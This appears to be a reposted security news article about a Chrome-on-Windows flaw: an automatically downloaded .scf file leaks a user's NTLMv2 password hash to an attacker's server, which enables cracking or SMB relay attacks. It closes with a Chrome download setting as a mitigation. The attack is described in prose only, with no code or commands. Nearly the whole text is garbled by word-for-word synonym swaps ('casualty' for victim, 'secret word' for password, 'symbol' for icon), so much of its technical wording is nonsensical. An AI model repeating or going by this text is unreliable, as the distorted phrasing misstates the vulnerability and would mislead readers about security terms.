Join Our Community!Join Our WhiteHat Group On facebook & Stay Updated.

Stealing Credentials/Data from Windows Using Google Chrome

A bug in Google’s Chrome program enables hackers to naturally download a malevolent document onto a casualty’s PC that could be utilized to take qualifications and dispatch SMB hand-off assaults.

Bosko Stankovic, data security build at DefenseCode, found the blemish in the default design of the most recent rendition of Chrome running on a refreshed variant of Microsoft’s Windows 10 working framework.

“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” he wrote Monday in a description of the vulnerability.


The procedure enables an aggressor to access a casualty’s username and Microsoft LAN Manager (NTLMv2) secret word hash. That leaves casualties open to an assortment of assaults including a Server Message Block (SMB) transfer assault. A SMB transfer assault enables an enemy to utilize a casualty’s certifications to verify to a PC or system asset, for example, email or remote server.

Assaults could likewise utilize this defenselessness to endeavor to split the objective’s hashed secret word. DefenseCode said it didn’t inform Google of the helplessness. At the point when Threatpost requested that Google remark a representative said: “We’re mindful of this and taking the essential activities.” Google didn’t detail.

As per Stankovic, the program assault is basic.

Initial, a casualty is tempted to tap on a uniquely created interface that triggers a programmed download of a Windows Explorer Shell Command File or SCF record (.scf) onto a casualty’s PC. The record is naturally downloaded to the objective’s C:\Users\%Username%\Downloads Folder.


Once the .SCF document is downloaded into the Download index it lays torpid. In any case, once the client opens the Download catalog envelope in Windows, the SCF document tries to recover information related to a Windows symbol situated on the aggressor’s server.


At the point when the SCF document endeavors to recover the remote symbol record information it give the aggressor’s server the casualty’s username and hashed adaptation of the casualty’s watchword. In the event that the casualty is a piece of a corporate system, the username and secret word is the system username and watchword doled out to the casualty by the organization’s framework chairman. On the off chance that the casualty is a home client, the SCF record will ask for the symbol information related with the house client’s Windows username and secret word.


Analysts free of DefenseCode call attention to that the defenselessness is not solely attached to the way the Chrome program handles SCF documents, additionally the way Windows handles them also.


As indicated by Stankovic, SCF records are lesser referred to document sorts backpedaling similarly as Windows 98 where it was basically utilized as a “Show Desktop” easy route. “It is basically a content document with segments that decide a summon to be run (constrained to running Explorer and flipping Desktop) and a symbol record area,” Stankovic said.


Specialists say this kind of assault could be utilized malignantly to endeavor to break the hashed watchword. The aggressor could likewise utilize the qualification ask for in a SMB hand-off assault. Under that situation an aggressor could forward the qualification demand to endeavor to get to NTLM-empowered administrations on a corporate system –, for example, email or system get to.


“Associations that enable remote access to administrations, for example, Microsoft Exchange (Outlook Anywhere) and utilize NTLM as confirmation technique, might be defenseless against SMB hand-off assaults, enabling the assailant to imitate the casualty, getting to information and frameworks without cracking the secret key,” Stankovic said.


To protect against the attack in Google Chrome, DefenseCode recommends visiting Settings> Show advanced settings> and Check the “Ask where to save each file before downloading” option.





Leave a Reply